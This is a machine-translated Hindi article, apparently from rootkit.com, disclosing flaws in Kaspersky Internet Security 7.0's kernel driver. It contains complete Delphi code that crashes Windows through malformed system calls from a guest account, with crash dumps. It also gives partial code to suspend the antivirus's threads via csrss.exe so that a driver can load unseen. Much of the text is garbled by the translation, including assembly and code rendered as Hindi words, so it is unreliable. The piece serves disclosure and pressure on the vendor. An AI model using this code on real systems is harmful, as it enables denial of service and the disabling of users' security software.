प्रस्तावना
Kaspersky एंटी-वायरस आज तकनीकी रूप से सबसे उन्नत एंटी-वायरस में से एक है। यह कुछ प्रकार के रूटकिटों से भी लड़ सकता है , जब वे जीवित हैं और हमला करने की कोशिश कर रहे हैं।
इसमें एक प्रोएक्टिव डिफेंस मॉड्यूल है, जो एक आंशिक एचआईपीएस कार्यान्वयन है जो सिद्धांत रूप में, कार्यक्रमों के व्यवहार का विश्लेषण करके और अनधिकृत कार्यों को रोकने के लिए अज्ञात खतरों से कंप्यूटर की रक्षा कर सकता है।
यह सभी सिद्धांत और विज्ञापन नारे हैं। वास्तव में, हमारे पास एक पूरी तरह से अलग स्थिति है। कई रूटकिट्स हैं जो एंटीवायरस द्वारा बिल्कुल भी नहीं पहचाने जाते हैं, और इसकी सक्रिय रक्षा को इस तरह से दबाया जा सकता है कि हमलावर अपने चालक को लोड कर सकता है, जिसके बाद कोई भी प्रोएक्टिव रक्षा बस बेकार है।
यह आलेख केवल त्रुटियों और कमजोरियों का अवलोकन नहीं है - प्रत्येक भाग के अंत में हम एंटी-वायरस डेवलपर्स को सिफारिशें देते हैं, क्योंकि हम देखते हैं कि वे इन त्रुटियों से अपने आप निपट नहीं सकते हैं। और समर्थकों के लिए, तुरंत एक आरक्षण है: निश्चित रूप से, जो कुछ भी नीचे लिखा गया है, वह महत्वपूर्ण कमजोरियां नहीं है, नहीं, नहीं =) बीएसओडी को केएवी / केआईएस के साथ स्थापित करने के लिए केवल कुछ सरल तरीके हैं, यहां तक कि एक अतिथि खाते से भी, बस केवीए / केआईएस वर्कअराउंड ... और इतने पर, सामान्य रूप से, दिल को बहुत अधिक न लें।
इस लेख में चर्चा की जाने वाली Kaspersky का संस्करण 7.0 है, अंतिम सार्वजनिक निर्माण 125 है, और उत्पाद प्रकार इंटरनेट सुरक्षा है।
Kaspersky और सिस्टम सर्विस डिस्क्रिप्टिव टेबल
एंटीवायरस के इस हिस्से को लंबे समय से सबसे कमजोर के रूप में जाना जाता है। यह ऐसा है क्योंकि इसमें कई प्राथमिक त्रुटियां हैं। ये त्रुटियां एक खराब लिखित सक्रिय रक्षा का एक और उदाहरण हैं।
Windows XP के तहत, Kaspersky एंटी-वायरस SSDT टेबल में सेवाएं जोड़ता है। कई सेवाएँ जो केवल Windows 2003 के अंतर्गत मौजूद हैं। उनकी संख्या 284 से 296 तक है। लगभग 13 अज्ञात प्रविष्टियाँ klif.sys के पते के साथ हैं।
यहाँ वे हैं:
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BD80 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BD90 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BDA0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BDC0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BDE0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE10 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE20 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE40 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BE50 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BF10 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809BFE0 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित 0xF809C020 हुक हैंडलर
ntkrnlpa.exe -> UNKNOWN_SSDT_ENTRY, 0xF809C060 हुक हैंडलर [C: \ WINDOWS \ system32 \ driver \ klif.sys] में स्थित है
यह क्या है यह पूरी तरह से समझ से बाहर है। हालाँकि, ऐसा लगता है कि KAV डेवलपर्स उन्हें Windows XP और 2003 के तहत SSDT तालिका में प्रविष्टियों की एक अलग संख्या के साथ समस्या को हल करने के लिए जोड़ रहे हैं। ऐसा क्यों किया गया यह तीसरा प्रश्न है।
और अब ध्यान दें: इनमें से किसी भी प्रविष्टि को हैक किया जा सकता है, इसके बाद बीएसओडी में एक सिस्टम क्रैश हो सकता है, यहां तक कि न्यूनतम विशेषाधिकार वाले अतिथि खाते के तहत भी। हमने एक छोटा सा कार्यक्रम लिखा। यह SSDT में इन रहस्यमय प्रविष्टियों के लिए गलत मापदंडों के साथ गलत सिस्टम कॉल उत्पन्न करता है। कोड बहुत सरल लेकिन प्रभावी है। इसे शुद्ध विंडोज पर चलाने से कुछ भी नहीं होगा, क्योंकि विंडोज स्वयं ऐसी स्थितियों को सही ढंग से संभालता है।
var
Services: array[0..12] of ULONG;
ThreadTerminated: boolean = false;
ExecThread: THANDLE;
function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
asm
mov eax, SysCallNumber
mov edx, Stack
int 2eh
mov Result,eax
end;
function exec(p1: pointer): DWORD; stdcall;
var
i: integer;
p2: DWORD;
p3: DWORD;
begin
randomize();
u := 0;
for i := 0 to 12 do Services[i] := 284 + i;
while not ThreadTerminated do
begin
p2 := random($FFFFFFFF);
p3 := Services[random(12)];
MakeSysCall(p3, @p2);
Sleep(100);
end;
CloseHandle(ExecThread);
ExecThread := 0;
result := 0;
end;
var
p2: DWORD;
begin
ThreadTerminated := false;
ExecThread := CreateThread(nil, 0, @exec, nil, 0, p2);
end;
निष्पादन परिणाम: Kaspersky Internet Security v7.0 125 बिल्ड
PAGE_FAULT_IN_NONPAGED_AREA (50)
अमान्य सिस्टम मेमोरी को संदर्भित किया गया था। इसे प्रयास को छोड़कर संरक्षित नहीं किया जा सकता है,
यह एक जांच द्वारा संरक्षित किया जाना चाहिए। आमतौर पर पता सिर्फ सादा खराब होता है या यह
मुक्त स्मृति की ओर इशारा कर रहा है।
तर्क:
Arg1: e0ae15f9, मेमोरी संदर्भित।
Arg2: 00000000, मान 0 = रीड ऑपरेशन, 1 = राइट ऑपरेशन।
Arg3: f8087e8c, यदि गैर-शून्य, अनुदेश पता जो खराब मेमोरी को संदर्भित करता है
पता।
Arg4: 00000000, (आरक्षित)
सभी bsod पाठ ...
लेकिन यह सब नहीं है!
SSDT में मौजूदा कमजोरियों की रिपोर्ट के बावजूद, Kaspersky Developers ने अभी तक उन्हें तय नहीं किया है!
हम इसे NTCALL नामक एक साधारण कार्यक्रम के साथ साबित कर सकते हैं। शुरू करने के बाद, यह गलत सिस्टम कॉल उत्पन्न करना शुरू कर देता है।
NtCreateSection - इस फ़ंक्शन को अमान्य मापदंडों के साथ कॉल करने से klif.sys में BSOD हो जाएगा।
यहाँ यह हमारा BSOD है:
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
यह एक बहुत ही सामान्य बगचेक है। आमतौर पर अपवाद पता पिनपॉइंट्स
ड्राइवर / फ़ंक्शन जो समस्या का कारण बना। इस पते पर हमेशा ध्यान दें
साथ ही ड्राइवर / छवि की लिंक तिथि जिसमें यह पता है।
कुछ सामान्य समस्याएं अपवाद कोड 0x80000003 हैं। इसका मतलब है एक कठिन
कोडित ब्रेकपॉइंट या अभिकथन हिट किया गया था, लेकिन यह सिस्टम बूट किया गया था
/ NODEBUG यह ऐसा नहीं होना चाहिए जैसा कि डेवलपर्स के पास कभी नहीं होना चाहिए
खुदरा कोड में हार्डकोड टूट गया है, लेकिन ...
यदि ऐसा होता है, तो सुनिश्चित करें कि एक डिबगर जुड़ा हुआ है, और
सिस्टम बूट / DEBUG है। यह हमें देखने देगा कि यह विराम बिंदु क्यों है
हो रहा।
तर्क:
Arg1: c0000005, अपवाद कोड जो संभाला नहीं गया था
Arg2: 805883ea, अपवाद जो हुआ उस पते पर
Arg3: f669a95c, ट्रैप फ्रेम
Arg4: 00000000
डिबगिंग विवरण:
- विश्लेषण: अज्ञात आकार के साथ कर्नेल। ज्ञात आकार के साथ प्रतीकों को पुनः लोड करने के लिए बाध्य करेगा।
विश्लेषण: बल पुनः लोड कमान: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** कर्नेल प्रतीक गलत हैं। कृपया विश्लेषण करने के लिए प्रतीकों को ठीक करें।
MODULE_NAME: klif
सभी bsod पाठ ...
मैं क्या कह सकता हूं? .. यह समय एसएसडीटी के साथ रुकने और एसएसडीटी रिकॉर्ड के लिए सामान्य हैंडलर लिखने का है। बेहतर लें और ओलेग ज़ैतसेव से पूछें कि एसएसडीटी में हुक कैसे सेट करें?)
कास्परस्की और शैडो एसएसडीटी (शैडो एसएसडीटी)
छाया SSDT win32k.sys में एक विशेष तालिका है जिसमें उपयोगकर्ता ग्राफिक इंटरफ़ेस (GDI) के प्रदर्शन से संबंधित सिस्टम फ़ंक्शन के पते शामिल हैं। कैसपर्सकी ने कुछ सेवाओं के लिए यहां कीलोगर्स को रोकने और आत्मरक्षा के लिए हुक स्थापित किए हैं।
और फिर, हुक खराब तरीके से सेट किए गए हैं।
गलत मापदंडों के साथ NtUserSendInput और ... -> haha, नया BSOD, क्या यह आपको कुछ BSOD जनरेटर की याद नहीं दिलाता है? =)
PAGE_FAULT_IN_NONPAGED_AREA (50)
अमान्य सिस्टम मेमोरी को संदर्भित किया गया था। इसे प्रयास को छोड़कर संरक्षित नहीं किया जा सकता है,
यह एक जांच द्वारा संरक्षित किया जाना चाहिए। आमतौर पर पता सिर्फ सादा खराब होता है या यह
मुक्त स्मृति की ओर इशारा कर रहा है।
तर्क:
Arg1: e1f83004, मेमोरी संदर्भित।
Arg2: 00000000, मान 0 = रीड ऑपरेशन, 1 = राइट ऑपरेशन।
Arg3: f9417eee, यदि गैर-शून्य, अनुदेश पता जो खराब मेमोरी को संदर्भित करता है
पता।
Arg4: 00000001, (आरक्षित)
डिबगिंग विवरण:
- विश्लेषण: अज्ञात आकार के साथ कर्नेल। ज्ञात आकार के साथ प्रतीकों को पुनः लोड करने के लिए बाध्य करेगा।
विश्लेषण: बल पुनः लोड कमान: .reload / f ntoskrnl.exe = FFFFFFFF804D7000,214600,41108004
***** कर्नेल प्रतीक गलत हैं। कृपया विश्लेषण करने के लिए प्रतीकों को ठीक करें।
MODULE_NAME: klif
सभी bsod पाठ ...
इस भाग के लिए सिफारिशें सरल हैं - अपने ड्राइवर को डिबगर के नीचे चलाएं।
निम्नलिखित कोड
वर
पी 1: पीचर;
शुरू करना
p1: = पीचर ($ ffffffff);
LoadLibraryA (p1);
अंत;
Acces Violation की ओर जाता है और यह सामान्य है, क्योंकि हमने फ़ंक्शन के लिए एक गलत पैरामीटर का उपयोग किया है, लेकिन जो सामान्य नहीं है वह है जहां Acess Violation होता है, पते पर - 0xF80B3306।
यह कोई मजाक नहीं है - 0xF80B3306। कोर प्रक्रियाओं में! और अधिक सटीक होने के लिए - klif.sys में।
देखते हैं क्या होता है।
हमने सिस्टम में प्रत्येक प्रक्रिया के लिए IAT ( 1 , 2 ) का एक मजबूत संशोधन पाया। देखें कि explorer.exe के साथ क्या होता है
[420] explorer.exe -> kernel32.dll -> LoadLibraryExA, प्रकार: पते पर IAT संशोधन 0x010010A8 -> 7C882FB0 हुक हैंडलर जो [कर्नेल 32.dll] में स्थित है।
[420] explorer.exe -> kernel32.dll -> LoadLibraryExW, प्रकार: पते पर IAT संशोधन 0x010010F8 -> 7C882FD8 हुक हैंडलर जो [कर्नेल32.dll में स्थित है]
[420] explorer.exe -> kernel32.dll -> LoadLibraryA, प्रकार: पते पर IAT संशोधन 0x01001150 -> 7C882F9C हुक हैंडलर जो [कर्नेल32.dll] में स्थित है।
[420] explorer.exe -> kernel32.dll -> LoadLibraryW, प्रकार: पते पर IAT संशोधन 0x010011D0 -> 88C882FC4 हुक हैंडलर जो [कर्नेल ३२०० में स्थित है]
[420] explorer.exe -> kernel32.dll -> GetProcAddress, प्रकार: पते पर IAT संशोधन 0x010011E4 -> 7C882FEC हुक हैंडलर जो [कर्नेल 32.dll] में स्थित है।
अजीब है, है ना? चलो कॉल को LoadLibraryA पर ट्रैक करते हैं।
KERNEL32.LoadLibraryA:
धक्कामुक्की
मूव एबप, एस्प
nop
पॉप ईबे
jmp + $ 7b830b4a // - klif.sys पर पुनर्निर्देशित
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
यह है कि क्या LoadLibraryA K कर्नेस्की एंटी-वायरस द्वारा IAT को पुनर्निर्देशित किए जाने के बाद कर्नेल 32.dll के अंदर दिखता है। क्या यह विकृति नहीं है?
यदि आप इस एंटीवायरस को अपने कंप्यूटर पर स्थापित करते हैं, तो आप (यह कैसी विडंबना है!) इसे अतिरिक्त कमजोरियों के लिए खोलें और Kaspersky एंटी-वायरस के लिए धन्यवाद बनाया! हँसी, और कुछ नहीं।
इस भाग में, हम अनुशंसा करते हैं कि कैसपर्सकी डेवलपर्स अपने उत्पाद से विकृतियों को हटा दें। सबसे पहले, कर्नेल प्रक्रियाओं के साथ संवाद करने के लिए बेहतर और सरल तरीके हैं, और दूसरी बात, यह सिर्फ एक विकृति है।
कैसपर्सकी एंटी-वायरस और आत्मरक्षा
जैसा कि आप में से अधिकांश जानते हैं, कैसपर्सकी एंटी-वायरस सक्रिय रूप से हमलों से बचाता है। इसकी प्रक्रियाएँ अनधिकृत पहुँच और दुर्भावनापूर्ण कार्यक्रमों द्वारा विनाश से सुरक्षित हैं। लेकिन सवाल यह है कि वे कितनी अच्छी तरह से संरक्षित हैं?
उत्तर: बीएडी।
Kaspersky SSDT (यानी NtOpenProcess, NtOpenThread, NtTerminateProcess, आदि) और शैडो SSDT (NtUserFindWowow, NtUserBuildHwndListList आदि) में कई हुक स्थापित करता है ताकि आगे के हमलों से खुद को बचाया जा सके।
अंत में, यह स्वयं को पुनरारंभ सेटिंग्स के साथ एक सेवा के रूप में स्थापित करता है जब कोई त्रुटि होती है। एसएसडीटी में कई हुक द्वारा सेवा सेटिंग्स को रजिस्ट्री में संरक्षित किया जाता है। तो हम इस एंटीवायरस को कैसे मार सकते हैं? और क्या हमें उसे मारने की जरूरत है? यदि हम avp.exe के दृश्य भाग को मारते हैं, तो इसे सेवा द्वारा फिर से शुरू किया जाएगा। यदि हम सेवा को मारते हैं, तो इसे सेवा नियंत्रण प्रबंधक (SCM) द्वारा लॉन्च किया जाएगा। तो हम इस एंटीवायरस को कैसे नष्ट कर सकते हैं (शैक्षिक उद्देश्यों के लिए, निश्चित रूप से)? सवाल अच्छा है।
उत्तर सरल है - ड्राइवर डाउनलोड करें, उसके बाद हम केएवी के हित के क्षेत्र से बाहर हो जाएंगे। लेकिन पहले, हमें इस अवसर को पाने के लिए इसे स्थगित करने की आवश्यकता है, है ना? वास्तव में नहीं। कम से कम तीन विधियां हैं जिनके द्वारा आप कैसपर्सकी प्रोएक्टिव डिफेंस 7.0 से थोड़ी सी प्रतिक्रिया के बिना ड्राइवर को चुपचाप डाउनलोड कर सकते हैं। और मुझे यकीन है कि अभी भी तरीके हैं। हमारे मामले में, हम बस कैसपर्सकी एंटी-वायरस प्रक्रियाओं के सभी थ्रेड्स को निलंबित कर देते हैं; बस रुकें, ज्यादा कुछ नहीं - बस इतना ही काफी है।
हम सीधे Kaspersky प्रक्रियाओं का उपयोग नहीं कर सकते, क्योंकि SSDT का मालिक PDM है । तो यह "पसंदीदा" पिछले दरवाजे प्रक्रिया का उपयोग करने का समय है जिसे csrss.exe कहा जाता है :)
इस उदाहरण में, हम एक प्राथमिकता मानते हैं कि KAV एप्लिकेशन का नाम avp.exe है और csrss.exe एक उदाहरण में मौजूद है (LOL, हाँ, यदि आपके पास रिंग 3 पर चलने वाला मैलवेयर है और csrss.exe के रूप में प्रच्छन्न है, तो इस कोड के साथ कुछ समस्याएं होंगी। )।
...
pBuffer.dwSize: = sizeof (PROCESSENTRY32W);
SnapShotHandle: = CreateToolHelp32SnapShot (TH32CS_SNAPPROCESS, 0);
...
अगर (ZwOpenProcess (@ph, PROCESS_ALL_ACCESS, @attr, @ cid1) <> STATUS_SUCCESS) तो बाहर निकलें;
...
ZwAllocateVirtualMemory (GetCurrentProcess (), buf , 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation (SystemHandleInformation, buf, 4194304, @bytesIO);
सभी कार्यक्रम पाठ ...
उसके बाद, दोनों निष्पादन योग्य कास्परस्की मॉड्यूल निलंबित हो जाएंगे और हम ड्राइवरों को लोड कर सकते हैं और अपना काम चुपचाप कर सकते हैं =)
KIS v7.0 का परीक्षण डिफ़ॉल्ट सेटिंग्स के साथ 125 का निर्माण करता है।
Windws XP SP2, व्यवस्थापक अधिकार।
हम अनुशंसा करते हैं कि उपयोगकर्ता खाता HANDLE_TABLE पर जाए और अपनी प्रक्रियाओं के संचालकों के लिए पहुँच अधिकार बदले। इसके अलावा यह NtDuplicateObject पर हुक को सुधारने का समय है।
उपसंहार
आप शायद खुद से पूछ रहे हैं कि इस तरह की स्पष्ट त्रुटियां - वास्तव में सबसे लोकप्रिय एंटीवायरस में से एक में अभी भी क्यों मौजूद हैं? हां, क्योंकि किसी को कैस्परस्की लैब के गधे के तहत एक अच्छी नौकरी देनी चाहिए।
बहुत पहले नहीं, हमने केएवी त्रुटियों की एक और समीक्षा प्रकाशित की। प्रतिक्रिया अपेक्षित थी। उन्होंने कहा, "चिंता मत करो, ये महत्वपूर्ण त्रुटियाँ नहीं हैं।" ठीक है, हाँ, शायद अतिथि खाते के तहत मौत की ब्लू स्क्रीन कंपनी के लिए इतनी बड़ी समस्या नहीं है। "सच में। सामान्य तौर पर बीएसओडी के लिए चे? बकवास, आराम करो लोग ":) लेकिन कुछ बदल रहा है - उन्होंने कई प्रकाशित कमजोरियों को बंद कर दिया, इसलिए हमें हमारे लिए थोड़ा धन्यवाद कहना चाहिए। इसके बजाय, हमें $ @% $ & # का एक गुच्छा मिलता है! आपके पते पर (अनौपचारिक रूप से, निश्चित रूप से)। खैर, हम सिर्फ इस तरह की प्रतिक्रिया के बारे में चिंता नहीं करते हैं, इसलिए अपने आप को (कट्टरपंथियों) लोगों को परेशान न करें। हम आत्म-प्रचार नहीं चाहते हैं और कैसपर्सकी से बेवकूफ बीएसओडी नहीं देखना चाहते हैं।
प्रिय कास्परस्की लैब डेवलपर्स, आपका एंटीवायरस बहुत अच्छा है, इसमें कोई संदेह नहीं है, लेकिन शायद इन बगों को ठीक करने का समय है? SSDT / IAT से विकृतियां दूर करें। अपने ड्राइवर में महत्वपूर्ण स्थितियों को अधिक सावधानी से संभालें। गंभीरता से नहीं, लेकिन क्या गलत है? Klif.sys को देखते हुए, मैं केवल एक चीज देखता हूं - एक बड़ा, छोटी गाड़ी चालक।
वैसे, किसी तरह से आप इस अद्भुत लेख में klif.sys की हमारी पिछली समीक्षा के लिए कास्परस्की लैब से अनौपचारिक प्रतिक्रिया पढ़ सकते हैं, जिसमें कुछ बेतुके बयान और अर्थहीन टिप्पणियां हैं। कुछ शब्दों में: इस लेख के लेखक ने आंशिक रूप से अपने पुराने और नए उत्पादों में कमजोरियों के बारे में जानकारी प्रकाशित करने का आरोप लगाया।
www.viruslist.ru/analysis?pubid=204007553
लेख रूसी में है, लेकिन मुझे यकीन है कि आप अंग्रेजी संस्करण पा सकते हैं।
मजा आ गया
VX आकाश से
EP_X0FF / UG उत्तर
rootkit.com
smartov: एक लेख के उद्धरण वे अंत में बात करते हैं
हाल के वर्षों में, निम्नलिखित स्थिति अत्यंत प्रासंगिक रही है। साइबर अपराधियों (या "सफेद टोपी के पीछे छिपने वाले") के वातावरण से कोई एक कोड अवधारणा विकसित कर रहा है जो सुरक्षा के आधुनिक साधनों को दरकिनार करता है, और प्रगति की देखभाल के रूप में प्रच्छन्न आत्म-पीआर के प्रयोजनों के लिए, इसे "अवांछनीय" के रूप में प्रकाशित करता है। हम जोर देते हैं: निश्चित रूप से, इस तरह की अवधारणा मौलिक रूप से undetectable नहीं है, लेकिन सुरक्षात्मक उपकरणों के ज्ञात कार्यों के एक या दो-चरण बाईपास के स्तर पर undetectable है। यदि सुरक्षा तंत्र ज्ञात हो तो इस तरह का वन-स्टेप बाईपास करना काफी सरल है।
इस तरह के प्रकाशन उपयोगकर्ताओं के एक निश्चित प्रतिशत का कारण बनते हैं जो मालवेयर और एंटीवायरस के ऑपरेटिंग सिद्धांतों से परिचित नहीं हैं, चिंता करने के लिए ("क्या मेरा एंटीवायरस उपकरण इस नए प्रकार के खतरे से बचाता है?")। ऐसी स्थिति में, सुरक्षात्मक उपकरणों के निर्माता केवल अपनी विश्वसनीयता को बहाल करने के लिए संसाधनों का हिस्सा फेंक सकते हैं: वर्णित अवधारणा को दरकिनार करने के लिए प्रौद्योगिकियों को विकसित करने के लिए, आमतौर पर अवधारणा के रूप में ही - एक-चरण। नतीजतन, प्राधिकरण को बहाल किया जाता है (लेकिन और कैसे?), सिस्टम "मैलवेयर - एंटीवायरस - उपयोगकर्ता" अपनी मूल स्थिति में आता है, और प्रक्रिया एक लूप में बंद हो जाती है। इसके प्रत्येक नए पुनरावृत्तियों में तेजी से परिष्कृत मैलवेयर और तेजी से भारी सुरक्षा उपकरण उत्पन्न होते हैं।
जैसा कि KVN में था: "महान योजना!"। इस तरह के असत्य स्वयं कमजोरियों को प्रकाशित करते हैं, और इस वजह से, खराब-विकट एंटीवायरस निर्माताओं को एक नया बेहतर उपयोगकर्ता इंटरफ़ेस विकसित
ps सबसे अधिक स्थापित KAV 7.0.0.125 ...